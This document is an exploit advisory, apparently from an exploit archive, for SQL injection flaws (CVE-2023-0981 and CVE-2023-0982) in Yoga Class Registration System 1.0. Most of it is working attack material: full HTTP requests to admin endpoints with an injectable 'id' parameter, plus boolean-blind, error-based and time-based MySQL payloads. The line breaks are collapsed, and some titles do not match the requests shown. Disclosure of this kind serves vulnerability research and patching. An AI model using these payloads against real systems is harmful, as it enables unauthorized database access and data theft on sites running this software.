Headline
Yoga Class Registration System 1.0 SQL Injection
Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: [CVE-2023-0982]# Tested on: Windows 11# PayloadGET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0981 )# Tested on: Windows 11```POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 6Origin: http://localhostConnection: closeReferer: http://localhost/php-ycrs/admin/?page=classesCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=96'```# PayloadParameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery -comment) Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE(SELECT 8487 UNION SELECT 3172) END))-- - Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: id=96' AND (SELECT 4409 FROM(SELECTCOUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0982 )# Tested on: Windows 11##PayloadPOST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322Content-Length: 286Origin: http://localhostConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="id"2'-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="status"1-----------------------------408548517113152447833471217322--##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)Related news
CVE-2023-0982
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Add Class Entry. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221677 was assigned to this vulnerability.
CVE-2023-0981
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been classified as critical. Affected is an unknown function of the component Delete User. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-221676.